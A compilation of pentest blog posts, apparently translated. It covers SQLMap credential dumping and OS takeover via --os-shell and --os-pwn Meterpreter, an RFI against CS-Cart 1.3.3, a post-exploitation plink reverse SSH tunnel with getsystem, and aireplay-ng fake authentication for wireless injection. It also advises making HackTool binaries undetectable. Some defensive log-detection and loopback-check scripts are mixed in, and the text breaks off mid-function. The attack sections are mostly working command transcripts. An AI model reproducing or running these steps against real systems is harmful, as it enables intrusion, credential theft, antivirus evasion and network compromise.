Dump Windows System Info

When you are asked to collect all the Windows system information (the list of users, services, installed software and its versions, Windows update history, and so on), you probably want to look at these tools:

System Information Collector

SAM/Password Extractor

Note: if you are familiar with reverse engineering, making these HackTool/PUA-flagged binaries undetectable is the best option 😀


Alternatively, attack the target system with Metasploit. The Meterpreter payload ships with a lot of scripts that are useful for digging out system information. I suggest attacking through Internet Explorer, since a client-side exploit is less likely to harm the system or the services running on it.

J. Dravet wrote up various techniques for retrieving the passwords; which one you use depends on your goal, so use them wisely.

Good luck 🙂

Remove Comments from Configuration

Sometimes when you want to configure something, the file carries the developer's comments, which help you figure out which options or arguments to use. But once you are already familiar with the configuration, the comments just get in the way, so here is how to eliminate them (using apache2.conf as the example):

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' /etc/apache2/apache2.conf | more

The three sed expressions do the following: 1p prints the first line unconditionally (apache2.conf opens with a comment banner, which this keeps; if the first line is not a comment it is printed twice), /^[[:blank:]]*#/d deletes lines that are entirely comments, and s/[[:blank:]][[:blank:]]*#.*// cuts a trailing comment off the end of a directive.

Or write it to a file:

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' /etc/apache2/apache2.conf > /etc/apache2/apache2.conf.nocomments

Use it with caution and always review the result: the trailing-comment rule also truncates any directive whose value contains a space followed by #, and redirecting straight back onto /etc/apache2/apache2.conf would empty the file before sed gets to read it. You've been warned!
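The recipe above wrapped as a function, next to a conservative variant, run over a constructed config snippet so the failure mode is visible. This is an added example, not part of the original post; the sample lines are made up and are not a real apache2.conf, and the 1p trick is left out so the leading banner is dropped too:

```shell
#!/usr/bin/env bash
# Added example, not from the original post: the comment-stripping sed
# from above as a function, beside a safer variant, run over a
# constructed config snippet that shows where the trailing-comment
# rule misfires. The file contents are made up for the demo.

# The post's recipe minus the 1p: drop whole-line comments, then cut
# everything from " #" to the end of the line.
strip_comments() {
  sed -e '/^[[:blank:]]*#/d' -e 's/[[:blank:]][[:blank:]]*#.*//' "$1"
}

# Conservative variant: drop whole-line comments only. A '#' inside a
# quoted directive value survives, at the cost of keeping trailing
# comments.
strip_comment_lines() {
  sed -e '/^[[:blank:]]*#/d' "$1"
}

# Show every line the aggressive variant changed or dropped, so the
# result can be reviewed before it replaces anything. Output goes to
# "$1.nocomments", never back onto the original file.
review_diff() {
  strip_comments "$1" > "$1.nocomments"
  diff "$1" "$1.nocomments" || true
}

# Constructed sample (not a real apache2.conf). The last line carries
# a '#' inside a quoted value, which strip_comments will clip.
write_sample() {
  cat > "$1" <<'EOF'
# Leading comment banner
ServerRoot "/etc/apache2"      # where the server lives
    # indented comment
Timeout 300
ErrorDocument 404 "Not found #404"
EOF
}
```

Run review_diff on a copy of the real file before trusting the output; the ErrorDocument line in the sample is exactly the kind of directive that the aggressive version silently breaks.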

How to: SQLMap (dump and destroy)

SQLMap is the tool for automating the exploitation of SQL injection vulnerabilities, and it is very popular for exactly that. While most web-hacking enthusiasts know it as a way to gather information and retrieve table contents, I want to show how powerful SQLMap is beyond being "a database dumper tool".

I will split this into 3 sections: as a fingerprinter (we already know this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.


root@bt:/pentest/database/sqlmap# ./sqlmap.py --url ""

sqlmap/0.9-dev - automatic SQL injection and database takeover tool

[*] starting at: 22:26:52

[22:26:52] [INFO] using '/pentest/database/sqlmap/output/' as session file
[22:26:52] [INFO] resuming match ratio '0.972' from session file
[22:26:52] [INFO] resuming injection point 'GET' from session file
[22:26:52] [INFO] resuming injection parameter 'id' from session file
[22:26:52] [INFO] resuming injection type 'numeric' from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5

[*] shutting down at: 22:26:52

Yes, we all know this part: it fingerprints the database engine, its version, and the operating system.

Enumerate Database

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "" --dbs


[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb

Database names enumerated; SQLMap always does the heavy lifting!

Enumerate tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "" -D webappdb --tables

[22:32:32] [INFO] fetching tables for database 'webappdb'
[22:32:32] [INFO] fetching number of tables for database 'webappdb'
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
| guestbook |
| users     |

Dump the tables

[22:36:54] [INFO] fetching columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 4
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': id
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': name
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': country
[22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 1
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': admin
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 123456
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 2
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': secret
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': SG
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': backup
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': backup12
Database: webappdb
Table: users
[3 entries]
| country | id | name   | password |
| ID      | 1  | admin  | 123456   |
| ID      | 2  | secret | password |
| SG      | 3  | backup | backup12 |

[22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/'
[22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/'

[*] shutting down at: 22:36:54

SQLMap has done a great job so far 🙂 Next, take over the system!!

Remote Command Execution

root@bt:/pentest/database/sqlmap#./sqlmap.py --url "" --os-shell

[22:51:25] [INFO] trying to upload the uploader agent

which web application language does the web server support?

[1] ASP (default)
[2] PHP
[3] JSP
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to '' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
>2 ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :

The Metasploit’s Meterpreter over SQL Injection

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "" --msf-path=/opt/metasploit3/msf3 --os-pwn

This time SQLMap uploads a PHP file that calls shell_exec() so it can run arbitrary commands on the remote system through PHP. Once that is in place, SQLMap invokes msfpayload (the Metasploit payload generator) to build a "portable executable" Meterpreter backdoor, which is encoded and uploaded through the PHP shell.

Once the executable is uploaded, SQLMap starts a Metasploit listener (multi/handler) and waits for the "portable exe backdoor" to be executed. When it runs, the Meterpreter shell comes up 🙂
I skip some of the output here because it is too long to paste.
----- everything before this line was creating the PHP shell and uploading it to the document root -----
[22:57:05] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection

which is the local address? []
which local port number do you want to use? [31503]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[22:57:46] [INFO] creation in progress ................ done
[22:58:03] [INFO] compression in progress . done
[22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe'
[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on
[*] Starting the payload handler...
[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
[*] Sending stage (748544 bytes) to
[*] Meterpreter session 1 opened ( ->
meterpreter> Loading extension espia...success.
meterpreter> Loading extension incognito...success.
meterpreter> Loading extension priv...success.
meterpreter> Loading extension sniffer...success.
meterpreter> Computer: XP_FDCC
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter> Server username: NT AUTHORITY\SYSTEM

meterpreter> shell
Process 3128 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


OS Pwned!
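Seen from the other side of the wire, the takeover above leaves traces in the web server's access log. sqlmap's default User-Agent begins with "sqlmap/" (trivially changed with --user-agent or --random-agent, so treat it as a bonus, not a control), the --os-shell/--os-pwn stagers land in the document root under tmp-prefixed names (the transcript shows tmpmtonj.exe) and are then requested over HTTP, and the blind extraction in the enumeration steps fires a burst of requests at one script from one client. The script below is an added example, not code from the post or from sqlmap; the log lines are constructed in Apache combined format and the stager file names in them are made up:

```shell
#!/usr/bin/env bash
# Added example, not from the original post or from sqlmap: three
# access-log checks for the sqlmap activity shown above. Input is
# Apache combined log format on stdin. Field split on '"' gives:
#   $1 client/ident/user/date   $2 request line   $6 User-Agent

# Clients whose User-Agent announces sqlmap. Defeated by --random-agent,
# so this catches default runs only.
sqlmap_user_agents() {
  awk -F'"' '$6 ~ /^sqlmap\// { split($1, a, " "); print a[1] }' | sort -u
}

# Requests for tmp*.php / tmp*.exe in the document root: the uploader
# agent, backdoor and payload stager that --os-shell/--os-pwn drop there.
# Prints "client method path".
stager_requests() {
  awk -F'"' '{
    split($1, a, " "); split($2, r, " ")
    if (r[2] ~ /^\/tmp[a-z]+\.(php|exe)([?]|$)/) print a[1], r[1], r[2]
  }'
}

# Request bursts: count hits per client per script (query string
# stripped) and print those at or above MIN as "count client path".
# Blind/boolean extraction sends hundreds to one URL.
request_bursts() {
  awk -F'"' -v min="${1:-50}" '{
    split($1, a, " "); split($2, r, " ")
    path = r[2]; sub(/\?.*/, "", path)
    c[a[1] " " path]++
  } END { for (k in c) if (c[k] >= min) print c[k], k }'
}

# Run all three over a log file.
scan_log() {
  echo "== clients announcing sqlmap in User-Agent =="; sqlmap_user_agents < "$1"
  echo "== requests for tmp*.php / tmp*.exe stagers =="; stager_requests < "$1"
  echo "== 50+ requests to one script from one client =="; request_bursts 50 < "$1"
}

# Constructed sample log (made-up traffic, combined format).
sample_log() {
  cat <<'EOF'
10.0.0.5 - - [12/Mar/2010:22:26:52 +0700] "GET /index.php?id=1 HTTP/1.1" 200 1532 "-" "sqlmap/0.9-dev (http://sqlmap.sourceforge.net)"
10.0.0.5 - - [12/Mar/2010:22:28:41 +0700] "GET /index.php?id=1%20AND%201=1 HTTP/1.1" 200 1532 "-" "sqlmap/0.9-dev (http://sqlmap.sourceforge.net)"
10.0.0.5 - - [12/Mar/2010:22:51:28 +0700] "GET /tmpuqjkf.php HTTP/1.1" 200 433 "-" "sqlmap/0.9-dev (http://sqlmap.sourceforge.net)"
10.0.0.5 - - [12/Mar/2010:22:51:28 +0700] "POST /tmpbdhle.php HTTP/1.1" 200 212 "-" "sqlmap/0.9-dev (http://sqlmap.sourceforge.net)"
192.168.1.20 - - [12/Mar/2010:22:30:00 +0700] "GET /index.php?id=2 HTTP/1.1" 200 1498 "-" "Mozilla/5.0 (Windows NT 5.1)"
192.168.1.20 - - [12/Mar/2010:22:30:05 +0700] "GET /about.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (Windows NT 5.1)"
EOF
}
```

Usage: scan_log /var/log/apache2/access.log. The stager check is the one worth alerting on: legitimate users never request tmp-something.php in the web root, and a hit there means the database user already had FILE-write privileges into the document root, which is the misconfiguration that made --os-shell possible in the first place.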

PHP Include Exploitation with Metasploit

Metasploit supports PHP include exploitation, better known as RFI (Remote File Inclusion). I will show how this works against CS-Cart 1.3.3, which is vulnerable to remote file inclusion.

The vulnerable path is classes/phpmailer/class.cs_phpmailer.php?classes_dir=[URL of arbitrary PHP code to include]

So in Metasploit the PHPURI path will look like this:


Let's see how this exploitation works.


Secure Browsing with an SSH Tunnel

I use this technique when I am on public internet access such as a wireless hotspot. Yes, secure browsing this time uses an SSH tunnel. It is an attractive technique because other traffic can "piggyback" on SSH, so the piggybacking packets are encrypted along with it (SSH is a secure protocol because every packet in transit is encrypted).

OK, enough small talk. The first thing you need is a server on the internet that you can SSH into (that is, one you can remote-control over SSH), for example your VPS, or perhaps your own standalone server at home (over Speedy or any other ISP that gives you a public IP). This time I am using a standalone server at home that already runs an SSH server. With that in place, the rest can be laid out step by step.

Second, SSH into our server with a command like the following:

toms@bt:~$ ssh t0m@111.222.333.444 -D 8080
t0m's password:
Linux sucks 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Fri Apr 23 11:50:00 2010 from

Note the SSH command I used: there is an extra -D 8080. -D 8080 opens port 8080 on the local side (localhost) as a SOCKS proxy; whatever is sent through port 8080 on localhost is encrypted the same way as the connection to port 22 for SSH, and leaves for the internet from the SSH server's side. In simple terms, anything that goes through port 8080 on localhost "piggybacks" on port 22, which is encrypted.

Before the next step, browse to IP Chicken to see your current IP address, so that later you can tell whether the technique worked.

Third, configure the browser to use a SOCKS5 proxy, pointing it at localhost on port 8080. Also make the browser resolve DNS through the proxy (in Firefox, "Proxy DNS when using SOCKS v5"); otherwise the web traffic is tunneled but the name lookups still leave the hotspot in the clear.

Once that is done, browse to IP Chicken again and compare. If the IP address shown is now our SSH server's IP, secure browsing through the SSH tunnel has worked.

This technique is very useful when you want to use a browser for sites that handle sensitive information: logging in to email (work/personal), logging in to social networks such as Facebook or Twitter, or making transactions on PayPal, eBay or Amazon.

Tunneling Techniques in Hacking

Tunneling is usually a technique for getting packets out of a network that is isolated by a firewall or by the network itself (NAT). Network administrators typically build a tunnel to reach the part of the network that cannot otherwise be reached. Imagine you are a network administrator who wants a remote connection into your own network, but the computer you want to reach sits behind NAT, on a network that is not routed to the internet. How do you do it? With tunneling, of course.

Tunneling is also used by pentesters to support penetration tests. Let's see the technique at work.
As a pentester, I was tasked with breaking into a system all the way, including the target's internal network. Long story short, I had obtained a remote shell on a computer that can only be reached from one network subnet. On closer inspection, the target computer had port 3389 open, meaning the Remote Desktop service was running and ready to be used. But because the target sits on a NAT network, a direct connection to port 3389 would be blocked right away by the gateway/firewall. I tried a reverse connection with netcat, but the obstacle turned out to be the firewall's OUTBOUND rule, which only allows connections to ports 80 and 443 and blocks everything else. That is why I thought of SSH tunneling: I prepared an SSH server listening on port 80. Oh, and I used BackTrack for all of this 🙂

The exploitation succeeded with Metasploit plus a little social engineering against one of the company's staff. Metasploit gave me a multi-purpose Meterpreter reverse shell.

msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started reverse handler on
[*] Using URL:
[*] Server started.
[*] Sending exploit to
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened ( ->
msf exploit(ms06_001_wmf_setabortproc) > sessions -l
Active sessions
  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter ->
msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ITUSR-54\admin
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

After obtaining SYSTEM-level access, I uploaded the SSH client from the PuTTY package, plink.exe.

meterpreter > upload /pentest/windows-binaries/tools/plink.exe C:\\windows\
[*] uploading  : /pentest/windows-binaries/tools/plink.exe -> C:\\windows\
[*] uploaded   : /pentest/windows-binaries/tools/plink.exe -> C:\windows\
meterpreter >

After that I opened a shell on the target and ran the SSH client to build a tunnel straight to the SSH server I had prepared earlier.

meterpreter > execute -f cmd -c -H
Process 1776 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\Desktop>plink -P 80 -l root -pw toor -C -R 3389:
plink -P 80 -l root -pw toor -C -R 3389:
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's key fingerprint is:
ssh-rsa 2048 ce:bf:86:ed:50:68:bf:21:8f:c2:a9:63:9f:07:d5:0c
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
Store key in cache? (y/n) y
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
Last login: Wed Feb 24 23:04:29 2010 from

You can see that an SSH connection has been established (on port 80) between the target and my machine, indicated by my BackTrack shell appearing on the target. On my machine, port 3389 immediately came up listening on (localhost): that is what the -R option does, it asks the SSH server to listen on 3389 and forward whatever connects there back through the tunnel to the target's Remote Desktop. At this point the target's Remote Desktop port 3389 has been tunneled to my machine on the same port, but over the SSH connection. Note that the -pw password sits on the target's command line and in its process list, so a throwaway account on the SSH server is advisable.

tom@bt:/$ rdesktop
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tunneling is useful in all kinds of situations; the one above is just one of them.
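Both tunnels in the two posts above create a listener, and each should be bound to loopback only: the `ssh -D 8080` SOCKS proxy on the laptop, and the port 3389 that `-R` opens on the SSH server. A SOCKS proxy on 0.0.0.0 at a hotspot (`ssh -D 0.0.0.0:8080` or `-g`) is a free relay for everyone on the Wi-Fi, and a remote forward exposed through `GatewayPorts yes` in sshd hands the tunneled RDP port to the whole internet. The check below is an added example, not from either post; it reads `ss -ltn` output on stdin so it can run against a live box or a saved listing, and the listings it ships with are constructed, not captured:

```shell
#!/usr/bin/env bash
# Added example, not from the original posts: verify that a tunnel
# listener (ssh -D SOCKS proxy, or a -R remote forward on the SSH
# server) is bound to loopback only. Reads `ss -ltn` output on stdin.

# Print the local socket addresses listening on PORT.
listeners_on_port() {
  awk -v p=":$1" 'NR > 1 && $1 == "LISTEN" {
      a = $4
      if (length(a) > length(p) && substr(a, length(a) - length(p) + 1) == p) print a
    }'
}

# Succeed only if PORT has at least one listener and every listener on
# it is 127.0.0.1 or [::1]; anything else is reachable from the network.
tunnel_is_loopback_only() {
  local addrs addr
  addrs=$(listeners_on_port "$1")
  [ -n "$addrs" ] || return 1
  for addr in $addrs; do
    case "$addr" in
      127.0.0.1:*|"[::1]:"*) ;;
      *) return 1 ;;
    esac
  done
  return 0
}

# Constructed listing: what `ssh -D 8080 user@host` normally produces.
sample_ss_loopback() {
  cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:8080      0.0.0.0:*
LISTEN 0      128    [::1]:8080          [::]:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
EOF
}

# Constructed listing: `ssh -D 0.0.0.0:8080` or `ssh -g -D 8080`; the
# proxy is open to the hotspot.
sample_ss_exposed() {
  cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:8080        0.0.0.0:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
EOF
}

# Live use, on the laptop after the ssh -D command:
#   ss -ltn | tunnel_is_loopback_only 8080 && echo "SOCKS proxy is loopback-only"
# and on the SSH server after the plink -R forward comes up:
#   ss -ltn | tunnel_is_loopback_only 3389 && echo "RDP forward is loopback-only"
```

The same check covers the `-R 3389` forward on the SSH server: if it shows up on 0.0.0.0 there, sshd has `GatewayPorts yes` and the tunneled Remote Desktop is exposed to anyone who can reach the server.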

How-to: Backtrack 4 USB Persistent Changes

Here is my quick-and-dirty way to run BT4 from a USB disk instead of the DVD.

    1. Boot the BackTrack 4 Live DVD
    2. Split your pendrive into 2 partitions: the 1st for the BT4 files, the 2nd for your changes. I have a 4 GB pendrive, so I made a 1500 MB partition for the BT4 files (FAT32) and gave the rest of the disk to a second partition with ext3. You can use fdisk or cfdisk for this.
    3. Format them using mkfs (the casper-rw label is what the live system looks for to store persistent changes):
      • mkfs.vfat -F 32 -n BT4 /dev/sdb1
      • mkfs.ext3 -b 4096 -L casper-rw /dev/sdb2
    4. Mount the first partition:
      • mkdir /mnt/BT4
      • mount /dev/sdb1 /mnt/BT4
    5. Copy all the BT4 files from the mounted DVD to our newly mounted partition (/mnt/BT4)
      • rsync -avh /media/cdrom/ /mnt/BT4/
    6. Install the GRUB boot loader
      • grub-install --no-floppy --root-directory=/mnt/BT4 /dev/sdb
    7. Edit the menu.lst file
      • nano /mnt/BT4/boot/grub/menu.lst
      • Start Persistent Live CD <---------- find this entry
      • (its kernel line) ... quiet vga=0x317 <---------- append vga=0x317 to that entry's kernel line like this
    8. umount /mnt/BT4
    9. reboot

That’s it. Can’t wait for the official release ^^
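The two places this procedure usually goes wrong are picking the target disk and step 7's hand-wavy edit. Below is an added example, not from the original post, that guards the destructive steps (whole disk only, never the disk holding the running root) and performs the menu.lst edit with awk so that only the "Start Persistent Live CD" entry gets vga=0x317. The partition layout and mount point follow the post; the sample menu.lst is constructed for the demo, not copied from the BT4 ISO:

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Guards for the BT4-on-USB
# procedure plus a deterministic version of step 7. The layout (sdX1
# FAT32 "BT4", sdX2 ext3 "casper-rw", mounted at /mnt/BT4) follows the
# post; the sample menu.lst below is made up for the demo.

# Accept only a whole disk (/dev/sdb), never a partition (/dev/sdb1).
is_whole_disk() {
  case "$1" in
    /dev/sd[a-z]) return 0 ;;
    *) return 1 ;;
  esac
}

# Refuse the disk that holds the running root filesystem.
# $1 = device behind "/" as printed by `df /`, $2 = candidate target.
is_root_disk() {
  case "$1" in
    "$2"|"$2"[0-9]*) return 0 ;;
    *) return 1 ;;
  esac
}

# Append vga=0x317 to the kernel line of the "Start Persistent Live CD"
# entry only; other entries and lines already carrying vga= are left
# alone. menu.lst on stdin, edited copy on stdout.
add_vga_to_persistent_entry() {
  awk '
    /^title/ { in_entry = ($0 ~ /Start Persistent Live CD/) }
    in_entry && /^[[:space:]]*kernel/ && !/vga=/ { $0 = $0 " vga=0x317" }
    { print }'
}

# The whole procedure with the guards applied. Partitioning is left to
# fdisk/cfdisk as in the post; everything else here is destructive.
make_bt4_usb() {
  local dev="$1" root_dev
  is_whole_disk "$dev" || { echo "usage: make_bt4_usb /dev/sdX" >&2; return 1; }
  root_dev=$(df / | awk 'NR == 2 { print $1 }')
  if is_root_disk "$root_dev" "$dev"; then
    echo "refusing: $dev holds the running system" >&2; return 1
  fi
  mkfs.vfat -F 32 -n BT4 "${dev}1" &&
  mkfs.ext3 -b 4096 -L casper-rw "${dev}2" &&
  mkdir -p /mnt/BT4 && mount "${dev}1" /mnt/BT4 &&
  rsync -avh /media/cdrom/ /mnt/BT4/ &&
  grub-install --no-floppy --root-directory=/mnt/BT4 "$dev" &&
  add_vga_to_persistent_entry < /mnt/BT4/boot/grub/menu.lst > /tmp/menu.lst.new &&
  cp /tmp/menu.lst.new /mnt/BT4/boot/grub/menu.lst &&
  umount /mnt/BT4
}

# Constructed menu.lst excerpt (not from the BT4 ISO).
sample_menu_lst() {
  cat <<'EOF'
default 0
timeout 30
title Start BackTrack FrameBuffer (1024x768)
kernel /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet
initrd /boot/initrd.gz
title Start Persistent Live CD
kernel /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet
initrd /boot/initrd.gz
EOF
}
```

Run as root: make_bt4_usb /dev/sdb after the two partitions exist. The root-disk guard compares against whatever df reports for /, so it also works when booted from the DVD, where / is the live overlay and the internal disk is not what you want mkfs pointed at either.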

Failed Packet Injection to the AP

Ever hit a case like this while happily injecting packets into a wireless network?

Saving ARP requests in replay_arp-0123-104950.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 17915 packets (got 3 ARP requests), sent 5854 packets...

Yes, this happens because the victim's MAC address is no longer associated with the local access point, or keeps dropping out, either because of a de-authentication we caused ourselves or because the signal is simply too weak to reach the victim's laptop/PC. There are 3 ways around it:

  1. Switch to the MAC address of another victim.
  2. Bait the AP with a second wireless card (you need 2 cards for this)
  3. Do a fake authentication to the AP

The first way is easy enough: kill the running aireplay-ng process and switch to the MAC address of another victim joined to the same AP. For the second, just bring up the second card (usually a PCMCIA/USB card), then send packets to the AP, or simply ping something on the internet. What I want to cover here is the third way, a fake authentication to the AP, done like this:

aireplay-ng -1 0 -e <ESSID> -a <AP BSSID> -h <our MAC> wifi0
aireplay-ng -1 0 -e linksys -a 00:18:F8:E1:76:BD -h 00:0F:54:3C:65:93 wifi0
If it succeeds it looks like this:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Or, alternatively, with keep-alive packets like this:

aireplay-ng -1 6000 -o 1 -q 10 -e linksys -a 00:18:F8:E1:76:BD -h 00:0F:54:3C:65:93 wifi0

which means:

  • 6000 – re-authenticate every 6000 seconds.
  • -o 1 – send only one packet at a time.
  • -q 10 – send a keep-alive packet every 10 seconds.

The result looks like this:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.

After that we can carry on injecting packets into the wireless network at our leisure ^^
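The third remedy can be automated: watch the ARP replay's output for the "deauth/disassoc" notice shown at the top of the post and re-run the fake authentication once it repeats, instead of noticing a stalled replay minutes later. The script below is an added example, not part of the original post or of aircrack-ng; the ESSID, BSSID and our MAC are the post's sample values, -3 is aireplay-ng's ARP request replay mode (the one that printed the "Saving ARP requests in replay_arp-..." line above), and the sample output fed to the offline test is constructed from the post's transcript:

```shell
#!/usr/bin/env bash
# Added example, not from the original post or from aircrack-ng: a
# watchdog around aireplay-ng's ARP replay (-3). After THRESHOLD
# "deauth/disassoc" notices the injecting MAC has lost its association,
# so we redo the fake authentication (-1 0) and carry on.
# ESSID/BSSID/OURMAC are the post's sample values.

ESSID="linksys"
BSSID="00:18:F8:E1:76:BD"
OURMAC="00:0F:54:3C:65:93"
IFACE="wifi0"
THRESHOLD=3

# Classify one line of aireplay-ng output: deauth | progress | other.
classify_line() {
  case "$1" in
    *"got a deauth/disassoc packet"*) echo deauth ;;
    "Read "*" packets"*)              echo progress ;;
    *)                                echo other ;;
  esac
}

# Pull the ARP request count out of a progress line such as
# "Read 17915 packets (got 3 ARP requests), sent 5854 packets..."
arp_requests() {
  printf '%s\n' "$1" | sed -n 's/.*got \([0-9][0-9]*\) ARP requests.*/\1/p'
}

# Offline decision: given aireplay-ng output on stdin, print "reassoc"
# when the notice count reaches THRESHOLD, otherwise "ok".
decide() {
  local line n=0
  while IFS= read -r line; do
    if [ "$(classify_line "$line")" = deauth ]; then n=$((n + 1)); fi
  done
  if [ "$n" -ge "$THRESHOLD" ]; then echo reassoc; else echo ok; fi
}

# One-shot fake authentication, exactly as in the post.
fake_auth() {
  aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$OURMAC" "$IFACE"
}

# Live loop: authenticate, start the ARP replay, and re-authenticate
# whenever the notice count reaches THRESHOLD.
replay_with_watchdog() {
  local n=0 line
  fake_auth
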